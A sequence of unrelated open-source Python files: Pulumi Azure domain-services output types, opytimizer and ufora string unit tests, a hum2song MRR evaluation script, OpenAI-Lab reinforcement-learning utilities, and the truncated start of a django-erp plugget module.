""" if ntlm_v1_enabled is not None: pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled) if sync_kerberos_passwords is not None: pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords) if sync_ntlm_passwords is not None: pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords) if sync_on_prem_passwords is not None: pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords) if tls_v1_enabled is not None: pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled) @property @pulumi.getter(name="ntlmV1Enabled") def ntlm_v1_enabled(self) -> Optional[bool]: """ Whether to enable legacy NTLM v1 support. Defaults to `false`. """ return pulumi.get(self, "ntlm_v1_enabled") @property @pulumi.getter(name="syncKerberosPasswords") def sync_kerberos_passwords(self) -> Optional[bool]: """ Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. """ return pulumi.get(self, "sync_kerberos_passwords") @property @pulumi.getter(name="syncNtlmPasswords") def sync_ntlm_passwords(self) -> Optional[bool]: """ Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. """ return pulumi.get(self, "sync_ntlm_passwords") @property @pulumi.getter(name="syncOnPremPasswords") def sync_on_prem_passwords(self) -> Optional[bool]: """ Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. """ return pulumi.get(self, "sync_on_prem_passwords") @property @pulumi.getter(name="tlsV1Enabled") def tls_v1_enabled(self) -> Optional[bool]: """ Whether to enable legacy TLS v1 support. Defaults to `false`. """ return pulumi.get(self, "tls_v1_enabled") @pulumi.output_type class GetServiceNotificationResult(dict): def __init__(__self__, *, additional_recipients: Sequence[str], notify_dc_admins: bool, notify_global_admins: bool): """ :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. :param bool notify_dc_admins: Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. :param bool notify_global_admins: Whether all Global Administrators are notified when there are alerts in the managed domain. """ pulumi.set(__self__, "additional_recipients", additional_recipients) pulumi.set(__self__, "notify_dc_admins", notify_dc_admins) pulumi.set(__self__, "notify_global_admins", notify_global_admins) @property @pulumi.getter(name="additionalRecipients") def additional_recipients(self) -> Sequence[str]: """ A list of additional email addresses to notify when there are alerts in the managed domain. """ return pulumi.get(self, "additional_recipients") @property @pulumi.getter(name="notifyDcAdmins") def notify_dc_admins(self) -> bool: """ Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. """ return pulumi.get(self, "notify_dc_admins") @property @pulumi.getter(name="notifyGlobalAdmins") def notify_global_admins(self) -> bool: """ Whether all Global Administrators are notified when there are alerts in the managed domain. """ return pulumi.get(self, "notify_global_admins") @pulumi.output_type class GetServiceReplicaSetResult(dict): def __init__(__self__, *, domain_controller_ip_addresses: Sequence[str], external_access_ip_address: str, id: str, location: str, service_status: str, subnet_id: str): """ :param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location in which the replica set resides. :param str service_status: The current service status for the replica set. :param str subnet_id: The ID of the subnet in which the replica set resides. """ pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses) pulumi.set(__self__, "external_access_ip_address", external_access_ip_address) pulumi.set(__self__, "id", id) pulumi.set(__self__, "location", location) pulumi.set(__self__, "service_status", service_status) pulumi.set(__self__, "subnet_id", subnet_id) @property @pulumi.getter(name="domainControllerIpAddresses") def domain_controller_ip_addresses(self) -> Sequence[str]: """ A list of subnet IP addresses for the domain controllers in the replica set, typically two. """ return pulumi.get(self, "domain_controller_ip_addresses") @property @pulumi.getter(name="externalAccessIpAddress") def external_access_ip_address(self) -> str: """ The publicly routable IP address for the domain controllers in the replica set. """ return pulumi.get(self, "external_access_ip_address") @property @pulumi.getter def id(self) -> str: """ The ID of the Domain Service. """ return pulumi.get(self, "id") @property @pulumi.getter def location(self) -> str: """ The Azure location in which the replica set resides. """ return pulumi.get(self, "location") @property @pulumi.getter(name="serviceStatus") def service_status(self) -> str: """ The current service status for the replica set. """ return pulumi.get(self, "service_status") @property @pulumi.getter(name="subnetId") def subnet_id(self) -> str: """ The ID of the subnet in which the replica set resides. """ return pulumi.get(self, "subnet_id") @pulumi.output_type class GetServiceSecureLdapResult(dict): def __init__(__self__, *, certificate_expiry: str, certificate_thumbprint: str, enabled: bool, external_access_enabled: bool, public_certificate: str): """ :param bool enabled: Whether secure LDAP is enabled for the managed domain. :param bool external_access_enabled: Whether external access to LDAPS over the Internet, is enabled. """ pulumi.set(__self__, "certificate_expiry", certificate_expiry) pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint) pulumi.set(__self__, "enabled", enabled) pulumi.set(__self__, "external_access_enabled", external_access_enabled) pulumi.set(__self__, "public_certificate", public_certificate) @property @pulumi.getter(name="certificateExpiry") def certificate_expiry(self) -> str: return pulumi.get(self, "certificate_expiry") @property @pulumi.getter(name="certificateThumbprint") def certificate_thumbprint(self) -> str: return pulumi.get(self, "certificate_thumbprint") @property @pulumi.getter def enabled(self) -> bool: """ Whether secure LDAP is enabled for the managed domain. """ return pulumi.get(self, "enabled") @property @pulumi.getter(name="externalAccessEnabled") def external_access_enabled(self) -> bool: """ Whether external access to LDAPS over the Internet, is enabled. """ return pulumi.get(self, "external_access_enabled") @property @pulumi.getter(name="publicCertificate") def public_certificate(self) -> str: return pulumi.get(self, "public_certificate") @pulumi.output_type class GetServiceSecurityResult(dict): def __init__(__self__, *, ntlm_v1_enabled: bool, sync_kerberos_passwords: bool, sync_ntlm_passwords: bool, sync_on_prem_passwords: bool, tls_v1_enabled: bool): """ :param bool ntlm_v1_enabled: Whether legacy NTLM v1 support is enabled. :param bool sync_kerberos_passwords: Whether Kerberos password hashes are synchronized to the managed domain. :param bool sync_ntlm_passwords: Whether NTLM password hashes are synchronized to the managed domain. :param bool sync_on_prem_passwords: Whether on-premises password hashes are synchronized to the managed domain. :param bool tls_v1_enabled: Whether legacy TLS v1 support is enabled. """ pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled) pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords) pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords) pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords) pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled) @property @pulumi.getter(name="ntlmV1Enabled") def ntlm_v1_enabled(self) -> bool: """ Whether legacy NTLM v1 support is enabled. """ return pulumi.get(self, "ntlm_v1_enabled") @property @pulumi.getter(name="syncKerberosPasswords") def sync_kerberos_passwords(self) -> bool: """ Whether Kerberos password hashes are synchronized to the managed domain. """ return pulumi.get(self, "sync_kerberos_passwords") @property @pulumi.getter(name="syncNtlmPasswords") def sync_ntlm_passwords(self) -> bool: """ Whether NTLM password hashes are synchronized to the managed domain. """ return pulumi.get(self, "sync_ntlm_passwords") @property @pulumi.getter(name="syncOnPremPasswords") def sync_on_prem_passwords(self) -> bool: """ Whether on-premises password hashes are synchronized to the managed domain. """ return pulumi.get(self, "sync_on_prem_passwords") @property @pulumi.getter(name="tlsV1Enabled") def tls_v1_enabled(self) -> bool: """ Whether legacy TLS v1 support is enabled. """ return pulumi.get(self, "tls_v1_enabled")
tests/opytimizer/optimizers/swarm/test_sso.py
anukaal/opytimizer
528
61827
import numpy as np from opytimizer.optimizers.swarm import sso from opytimizer.spaces import search def test_sso_params(): params = { 'C_w': 0.1, 'C_p': 0.4, 'C_g': 0.9 } new_sso = sso.SSO(params=params) assert new_sso.C_w == 0.1 assert new_sso.C_p == 0.4 assert new_sso.C_g == 0.9 def test_sso_params_setter(): new_sso = sso.SSO() try: new_sso.C_w = 'a' except: new_sso.C_w = 0.1 try: new_sso.C_w = -1 except: new_sso.C_w = 0.1 assert new_sso.C_w == 0.1 try: new_sso.C_p = 'b' except: new_sso.C_p = 0.4 try: new_sso.C_p = 0.05 except: new_sso.C_p = 0.4 assert new_sso.C_p == 0.4 try: new_sso.C_g = 'c' except: new_sso.C_g = 0.9 try: new_sso.C_g = 0.35 except: new_sso.C_g = 0.9 assert new_sso.C_g == 0.9 def test_sso_compile(): search_space = search.SearchSpace(n_agents=10, n_variables=2, lower_bound=[0, 0], upper_bound=[10, 10]) new_sso = sso.SSO() new_sso.compile(search_space) try: new_sso.local_position = 1 except: new_sso.local_position = np.array([1]) assert new_sso.local_position == np.array([1]) def test_sso_evaluate(): def square(x): return np.sum(x**2) search_space = search.SearchSpace(n_agents=10, n_variables=2, lower_bound=[0, 0], upper_bound=[10, 10]) new_sso = sso.SSO() new_sso.compile(search_space) new_sso.evaluate(search_space, square) def test_sso_update(): search_space = search.SearchSpace(n_agents=10, n_variables=2, lower_bound=[0, 0], upper_bound=[10, 10]) new_sso = sso.SSO() new_sso.compile(search_space) new_sso.update(search_space)
utils/eval_mrr.py
BaoLocPham/hum2song
108
61831
import argparse import csv import sys import os sys.path.append(os.path.dirname(os.path.dirname(__file__))) from modules.metric import mean_reciprocal_rank def main(csv_path): acc = 0 num = 0 with open(csv_path, "r") as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 for row in csv_reader: if line_count > 0: hum_id = row[0].split(".")[0] preds = [] for col in row[1:]: preds.append(str(col)) print(hum_id, mean_reciprocal_rank(preds, str(hum_id))) acc += mean_reciprocal_rank(preds, str(hum_id)) num += 1 line_count += 1 print(f'Processed {line_count} lines.') return acc / num if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--csv_path", type=str, required=True, help="path to predict csv") args = parser.parse_args() mrr = main(args.csv_path) print("-----------------------------") print(f"MRR: {mrr}")
rl/util.py
AsimKhan2019/OpenAI-Lab
340
61832
<filename>rl/util.py import argparse import collections import inspect import json import logging import multiprocessing as mp import numpy as np import re import sys import zipfile from datetime import datetime, timedelta from os import path, listdir, environ, getpid from textwrap import wrap PARALLEL_PROCESS_NUM = mp.cpu_count() TIMESTAMP_REGEX = r'(\d{4}_\d{2}_\d{2}_\d{6})' SPEC_PATH = path.join(path.dirname(__file__), 'spec') COMPONENT_LOCKS = json.loads( open(path.join(SPEC_PATH, 'component_locks.json')).read()) LOCK_HEAD_REST_SIG = { # signature list of [head, rest] in component lock 'mutex': [[0, 0], [1, 1]], 'subset': [[0, 0], [1, 0], [1, 1]], } # parse_args to add flag parser = argparse.ArgumentParser(description='Set flags for functions') parser.add_argument("-b", "--blind", help="dont render graphics", action="store_const", dest="render", const=False, default=True) parser.add_argument("-d", "--debug", help="activate debug log", action="store_const", dest="loglevel", const=logging.DEBUG, default=logging.INFO) parser.add_argument("-e", "--experiment", help="specify experiment to run", action="store", type=str, nargs='?', dest="experiment", default="dev_dqn") parser.add_argument("-p", "--param_selection", help="run parameter selection if present", action="store_true", dest="param_selection", default=False) parser.add_argument("-q", "--quiet", help="change log to warning level", action="store_const", dest="loglevel", const=logging.WARNING, default=logging.INFO) parser.add_argument("-t", "--times", help="number of times session is run", action="store", nargs='?', type=int, dest="times", default=1) parser.add_argument("-x", "--max_episodes", help="manually set environment max episodes", action="store", nargs='?', type=int, dest="max_epis", default=-1) args = parser.parse_args([]) if environ.get('CI') else parser.parse_args() # Goddam python logger logger = logging.getLogger(__name__) handler = logging.StreamHandler(sys.stdout) handler.setFormatter( logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')) logger.setLevel(args.loglevel) logger.addHandler(handler) logger.propagate = False environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # mute tf warnings on optimized setup def check_equal(iterator): '''check if list contains all the same elements''' iterator = iter(iterator) try: first = next(iterator) except StopIteration: return True return all(first == rest for rest in iterator) def check_lock(lock_name, lock, experiment_spec): ''' refer to rl/spec/component_locks.json check a spec's component lock using binary signatures e.g. head = problem (discrete) rest = [Agent, Policy] (to be discrete too) first check if rest all has the same signature, i.e. same set then check pair [bin_head, bin_rest] in valid_lock_sig_list as specified by the lock's type ''' lock_type = lock['type'] valid_lock_sig_list = LOCK_HEAD_REST_SIG[lock_type] lock_head = lock['head'] bin_head = (experiment_spec[lock_head] in lock[lock_head]) bin_rest_list = [] for k, v_list in lock.items(): if k in experiment_spec and k != lock_head: bin_rest_list.append(experiment_spec[k] in v_list) # rest must all have the same signature rest_equal = check_equal(bin_rest_list) if not rest_equal: logger.warn( 'All components need to be of the same set, ' 'check component lock "{}" and your spec "{}"'.format( lock_name, experiment_spec['experiment_name'])) bin_rest = bin_rest_list[0] lock_sig = [bin_head, bin_rest] lock_valid = lock_sig in valid_lock_sig_list if not lock_valid: logger.warn( 'Component lock violated: "{}", spec: "{}"'.format( lock_name, experiment_spec['experiment_name'])) return lock_valid def check_component_locks(experiment_spec): ''' check the spec components for all locks to ensure no lock is violated refer to rl/spec/component_locks.json ''' for lock_name, lock in COMPONENT_LOCKS.items(): check_lock(lock_name, lock, experiment_spec) return # import and safeguard the PROBLEMS, EXPERIMENT_SPECS with checks def import_guard_asset(): PROBLEMS = json.loads(open(path.join(SPEC_PATH, 'problems.json')).read()) EXPERIMENT_SPECS = {} spec_files = [spec_json for spec_json in listdir( SPEC_PATH) if spec_json.endswith('experiment_specs.json')] for filename in spec_files: specs = json.loads(open(path.join(SPEC_PATH, filename)).read()) EXPERIMENT_SPECS.update(specs) REQUIRED_PROBLEM_KEYS = [ 'GYM_ENV_NAME', 'SOLVED_MEAN_REWARD', 'MAX_EPISODES', 'REWARD_MEAN_LEN'] REQUIRED_SPEC_KEYS = [ 'problem', 'Agent', 'HyperOptimizer', 'Memory', 'Optimizer', 'Policy', 'PreProcessor', 'param'] for problem_name, problem in PROBLEMS.items(): assert all(k in problem for k in REQUIRED_PROBLEM_KEYS), \ '{} needs all REQUIRED_PROBLEM_KEYS'.format( problem_name) for experiment_name, spec in EXPERIMENT_SPECS.items(): assert all(k in spec for k in REQUIRED_SPEC_KEYS), \ '{} needs all REQUIRED_SPEC_KEYS'.format(experiment_name) EXPERIMENT_SPECS[experiment_name]['experiment_name'] = experiment_name check_component_locks(spec) # check component_locks.json if 'param_range' not in EXPERIMENT_SPECS[experiment_name]: continue param_range = EXPERIMENT_SPECS[experiment_name]['param_range'] for param_key, param_val in param_range.items(): if isinstance(param_val, list): param_range[param_key] = sorted(param_val) elif isinstance(param_val, dict): pass else: assert False, \ 'param_range value must be list or dict: {}.{}:{}'.format( experiment_name, param_key, param_val) EXPERIMENT_SPECS[experiment_name]['param_range'] = param_range return PROBLEMS, EXPERIMENT_SPECS PROBLEMS, EXPERIMENT_SPECS = import_guard_asset() def log_self(subject): max_info_len = 300 info = '{}, param: {}'.format( subject.__class__.__name__, to_json(subject.__dict__)) trunc_info = ( info[:max_info_len] + '...' if len(info) > max_info_len else info) logger.debug(trunc_info) def wrap_text(text): return '\n'.join(wrap(text, 60)) def make_line(line='-'): if environ.get('CI'): return columns = 80 line_str = line*int(columns) return line_str def log_delimiter(msg, line='-'): delim_msg = '''\n{0}\n{1}\n{0}\n\n'''.format( make_line(line), msg) logger.info(delim_msg) def log_trial_delimiter(trial, action): log_delimiter('{} Trial #{}/{} on PID {}:\n{}'.format( action, trial.trial_num, trial.num_of_trials, getpid(), trial.trial_id), '=') def log_session_delimiter(sess, action): log_delimiter( '{} Session #{}/{} of Trial #{}/{} on PID {}:\n{}'.format( action, sess.session_num, sess.num_of_sessions, sess.trial.trial_num, sess.trial.num_of_trials, getpid(), sess.session_id)) def timestamp(): '''timestamp used for filename''' timestamp_str = '{:%Y_%m_%d_%H%M%S}'.format(datetime.now()) assert re.search(TIMESTAMP_REGEX, timestamp_str) return timestamp_str def timestamp_elapse(s1, s2): '''calculate the time elapsed between timestamps from s1 to s2''' FMT = '%Y_%m_%d_%H%M%S' delta_t = datetime.strptime(s2, FMT) - datetime.strptime(s1, FMT) return str(delta_t) def timestamp_elapse_to_seconds(s1): a = datetime.strptime(s1, '%H:%M:%S') secs = timedelta(hours=a.hour, minutes=a.minute, seconds=a.second).seconds return secs # own custom sorted json serializer, cuz python def to_json(o, level=0): INDENT = 2 SPACE = " " NEWLINE = "\n" ret = "" if isinstance(o, dict): ret += "{" + NEWLINE comma = "" for k in sorted(o.keys()): v = o[k] ret += comma comma = ",\n" ret += SPACE * INDENT * (level+1) ret += '"' + str(k) + '":' + SPACE ret += to_json(v, level + 1) ret += NEWLINE + SPACE * INDENT * level + "}" elif isinstance(o, str): ret += '"' + o + '"' elif isinstance(o, list) or isinstance(o, tuple): ret += "[" + ",".join([to_json(e, level+1) for e in o]) + "]" elif isinstance(o, bool): ret += "true" if o else "false" elif isinstance(o, int): ret += str(o) elif isinstance(o, float): ret += '%.7g' % o elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.integer): ret += "[" + ','.join(map(str, o.flatten().tolist())) + "]" elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.inexact): ret += "[" + \ ','.join(map(lambda x: '%.7g' % x, o.flatten().tolist())) + "]" elif o is None: ret += 'null' elif hasattr(o, '__class__'): ret += '"' + o.__class__.__name__ + '"' else: raise TypeError( "Unknown type '%s' for json serialization" % str(type(o))) return ret # format object and its properties into printable dict def format_obj_dict(obj, keys): if isinstance(obj, dict): return to_json( {k: obj.get(k) for k in keys if obj.get(k) is not None}) else: return to_json( {k: getattr(obj, k, None) for k in keys if getattr(obj, k, None) is not None}) # cast dict to have flat values (int, float, str) def flat_cast_dict(d): for k in d: v = d[k] if not isinstance(v, (int, float)): d[k] = str(v) return d def flatten_dict(d, parent_key='', sep='_'): items = [] for k, v in d.items(): new_key = parent_key + sep + k if parent_key else k if isinstance(v, collections.MutableMapping): items.extend(flatten_dict(v, new_key, sep=sep).items()) else: items.append((new_key, v)) return dict(items) def get_module(GREF, dot_path): # get module from globals() by string dot_path path_arr = dot_path.split('.') # base level from globals mod = GREF.get(path_arr.pop(0)) for deeper_path in path_arr: mod = getattr(mod, deeper_path) return mod def import_package_files(globals_, locals_, __file__): ''' Dynamically import all the public attributes of the python modules in this file's directory (the package directory) and return a list of their names. ''' exports = [] # globals_, locals_ = globals(), locals() package_path = path.dirname(__file__) package_name = path.basename(package_path) for filename in listdir(package_path): modulename, ext = path.splitext(filename) if modulename[0] != '_' and ext in ('.py', '.pyw'): subpackage = '{}.{}'.format( package_name, modulename) # pkg relative module = __import__(subpackage, globals_, locals_, [modulename]) modict = module.__dict__ names = (modict['__all__'] if '__all__' in modict else [name for name in modict if inspect.isclass(modict[name])]) # all public exports.extend(names) globals_.update((name, modict[name]) for name in names) return exports def clean_id_str(id_str): return id_str.split('/').pop().split('.').pop(0) def parse_trial_id(id_str): c_id_str = clean_id_str(id_str) if re.search(TIMESTAMP_REGEX, c_id_str): name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str) if len(name_time_trial) == 3: return c_id_str else: return None else: return None def parse_experiment_id(id_str): c_id_str = clean_id_str(id_str) if re.search(TIMESTAMP_REGEX, c_id_str): name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str) name_time_trial.pop() experiment_id = ''.join(name_time_trial) return experiment_id else: return None def parse_experiment_name(id_str): c_id_str = clean_id_str(id_str) experiment_id = parse_experiment_id(c_id_str) if experiment_id is None: experiment_name = c_id_str else: experiment_name = re.sub(TIMESTAMP_REGEX, '', experiment_id).strip('-') assert experiment_name in EXPERIMENT_SPECS, \ '{} not in EXPERIMENT_SPECS'.format(experiment_name) return experiment_name def load_data_from_trial_id(id_str): experiment_id = parse_experiment_id(id_str) trial_id = parse_trial_id(id_str) data_filename = './data/{}/{}.json'.format(experiment_id, trial_id) try: data = json.loads(open(data_filename).read()) except (FileNotFoundError, json.JSONDecodeError): data = None return data def load_data_array_from_experiment_id(id_str): # to load all ./data files for a series of trials experiment_id = parse_experiment_id(id_str) data_path = './data/{}'.format(experiment_id) trial_id_array = [ f for f in listdir(data_path) if (path.isfile(path.join(data_path, f)) and f.startswith(experiment_id) and f.endswith('.json')) ] return list(filter(None, [load_data_from_trial_id(trial_id) for trial_id in trial_id_array])) def save_experiment_data(data_df, trial_id): experiment_id = parse_experiment_id(trial_id) filedir = './data/{0}'.format(experiment_id) filename = '{0}_analysis_data.csv'.format(experiment_id) filepath = '{}/{}'.format(filedir, filename) data_df.round(6).to_csv(filepath, index=False) # zip the csv and best trial json for upload to PR zipfile.ZipFile(filepath+'.zip', mode='w').write( filepath, arcname=filename) trial_filename = data_df.loc[0, 'trial_id'] + '.json' trial_filepath = '{}/{}'.format(filedir, trial_filename) zipfile.ZipFile(trial_filepath+'.zip', mode='w').write( trial_filepath, arcname=trial_filename) logger.info( 'experiment data saved to {}'.format(filepath)) def configure_hardware(RAND_SEED): '''configure rand seed, GPU''' from keras import backend as K if K.backend() == 'tensorflow': K.tf.set_random_seed(RAND_SEED) else: K.theano.tensor.shared_randomstreams.RandomStreams(seed=RAND_SEED) if K.backend() != 'tensorflow': # GPU config for tf only return process_num = PARALLEL_PROCESS_NUM if args.param_selection else 1 tf = K.tf gpu_options = tf.GPUOptions( allow_growth=True, per_process_gpu_memory_fraction=1./float(process_num)) config = tf.ConfigProto( gpu_options=gpu_options, allow_soft_placement=True) sess = tf.Session(config=config) K.set_session(sess) return sess def debug_mem_usage(): import psutil from mem_top import mem_top pid = getpid() logger.debug( 'MEM USAGE for PID {}, MEM_INFO: {}\n{}'.format( pid, psutil.Process().memory_info(), mem_top())) def del_self_attr(subject): self_attrs = list(subject.__dict__.keys()) for attr in self_attrs: delattr(subject, attr) import gc gc.collect() # clone a keras model without file I/O def clone_model(model, custom_objects=None): from keras.models import model_from_config custom_objects = custom_objects or {} config = { 'class_name': model.__class__.__name__, 'config': model.get_config(), } clone = model_from_config(config, custom_objects=custom_objects) clone.set_weights(model.get_weights()) return clone # clone a keras optimizer without file I/O def clone_optimizer(optimizer): from keras.optimizers import optimizer_from_config if isinstance(optimizer, str): return get(optimizer) params = dict([(k, v) for k, v in optimizer.get_config().items()]) config = { 'class_name': optimizer.__class__.__name__, 'config': params, } clone = optimizer_from_config(config) return clone
ufora/FORA/python/PurePython/StringTestCases.py
ufora/ufora
571
61852
# Copyright 2015 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import ufora.test.PerformanceTestReporter as PerformanceTestReporter import sys class StringTestCases(object): """Test cases for pyfora strings""" def test_string_indexing(self): def f(): a = "abc" return (a[0], a[1], a[2], a[-1], a[-2]) self.equivalentEvaluationTest(f) def test_strings_with_weird_characters(self): x = "\xb0" def f(): return (x,"\xb0") self.equivalentEvaluationTest(f) def test_large_string_indexing_perf(self): def f(ct, passCt): x = "asdfasdf" * (ct / 8) res = 0 for _ in xrange(passCt): for ix in xrange(len(x)): res = res + len(x[ix]) return res self.evaluateWithExecutor(f, 1000000, 1) self.evaluateWithExecutor(f, 10000, 1) @PerformanceTestReporter.PerfTest("pyfora.string_indexing.large_string") def test1(): self.evaluateWithExecutor(f, 1000000, 100) @PerformanceTestReporter.PerfTest("pyfora.string_indexing.small_string") def test2(): self.evaluateWithExecutor(f, 10000, 10000) test1() test2() def test_large_string_parsing_perf(self): def f(ct, passCt): x = "1,2,3,4," * ct res = 0 for _ in xrange(passCt): ix = 0 while ix < len(x): res = res + int(x[ix:ix+1]) + 12341234 ix = ix + 2 return res self.evaluateWithExecutor(f, 1000000, 1) with PerformanceTestReporter.RecordAsPerfTest("pyfora.string_to_int"): self.evaluateWithExecutor(f, 1000000, 10) def test_string_slicing(self): def f(ct, passCt,chars): x = "asdfasdf" * (ct / 8) res = 0 for _ in xrange(passCt): for ix in xrange(len(x)): res = res + len(x[ix:ix+chars]) return res self.evaluateWithExecutor(f, 1000000, 1, 2) self.evaluateWithExecutor(f, 10000, 1, 2) def runTest(func, name): PerformanceTestReporter.PerfTest(name)(func)() runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.pyfora") sys.setcheckinterval(100000) runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.native") runTest(lambda: f(1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.native") runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.native") runTest(lambda: f(10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.native") sys.setcheckinterval(100) def test_string_slicing_into_vector(self): def testFunction(ct, passCt,chars): x = "asdfasdf" * (ct / 8) res = 0 for _ in xrange(passCt): v = [x[ix*chars:ix*chars+chars] for ix in xrange(len(x) / chars)] for e in v: res = res + len(e) return res f = testFunction self.evaluateWithExecutor(f, 1000000, 1, 2) self.evaluateWithExecutor(f, 10000, 1, 2) def runTest(func, name): PerformanceTestReporter.PerfTest(name)(func)() runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.pyfora") runTest(lambda: self.evaluateWithExecutor(f, 10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.pyfora") sys.setcheckinterval(100000) runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.native") runTest(lambda: f(1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.native") runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.native") runTest(lambda: f(10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.native") sys.setcheckinterval(100) def test_string_splitlines(self): #test a wide variety of strings with combinations of different separators stringsToTest = [] for char1 in ["","a"]: stringsToTest.append(char1) for sep1 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]: stringsToTest.append(char1 + sep1) for char2 in ["","b"]: stringsToTest.append(char1 + sep1 + char2) for sep2 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]: stringsToTest.append(char1 + sep1 + char2 + sep2) def f(): res = [] for shouldSplit in [True, False]: for candidate in stringsToTest: res = res + [(candidate, candidate.splitlines(shouldSplit))] self.equivalentEvaluationTest(f) def test_string_split(self): #test a wide variety of strings with combinations of different separators stringsToTest = ["", "a", "aa", "ab", "aba", "aaa", "bbb", "abab", "abc"] sepsToTest = ["a","b"] def f(): res = [] for s in stringsToTest: for sep in sepsToTest: res = res + [(s,sep, s.split(sep))] self.equivalentEvaluationTest(f) def test_string_indexing_2(self): def f(idx): x = "asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf" return x[idx] self.equivalentEvaluationTest(f, -1) self.equivalentEvaluationTest(f, -2) self.equivalentEvaluationTest(f, 0) self.equivalentEvaluationTest(f, 1) def test_string_comparison(self): def f(): a = "a" b = "b" r1 = a < b r2 = a > b return (r1, r2) self.equivalentEvaluationTest(f) def test_string_duplication(self): def f(): a = "asdf" r1 = a * 20 r2 = 20 * a return (r1, r2) self.equivalentEvaluationTest(f) def test_string_equality_methods(self): def f(): a = "val1" b = "val1" r1 = a == b r2 = a != b a = "val2" r3 = a == b r4 = a != b r5 = a.__eq__(b) r6 = a.__ne__(b) return (r1, r2, r3, r4, r5, r6) self.equivalentEvaluationTest(f) def test_large_strings(self): def f(): a = "val1" while len(a) < 1000000: a = a + a return a self.equivalentEvaluationTest(f) def test_define_constant_string(self): x = "a string" with self.create_executor() as executor: define_x = executor.define(x) fora_x = define_x.result() self.assertIsNotNone(fora_x) def test_compute_string(self): def f(): return "a string" remote = self.evaluateWithExecutor(f) self.assertEqual(f(), remote) self.assertTrue(isinstance(remote, str)) def test_strings_1(self): def f(): x = "asdf" return x self.equivalentEvaluationTest(f)
djangoerp/pluggets/pluggets.py
xarala221/django-erp
345
61877
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals """This file is part of the django ERP project. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright (c) 2013-2015, django ERP Team' __version__ = '0.0.5' from django.utils.translation import ugettext_noop as _ from djangoerp.menus.utils import get_bookmarks_for from djangoerp.menus.models import Menu from .loading import registry from .forms import TextPluggetForm def dummy(context): return registry.default_func(context) def menu(context): """Menu plugget. Simply renders a menu. """ """ It 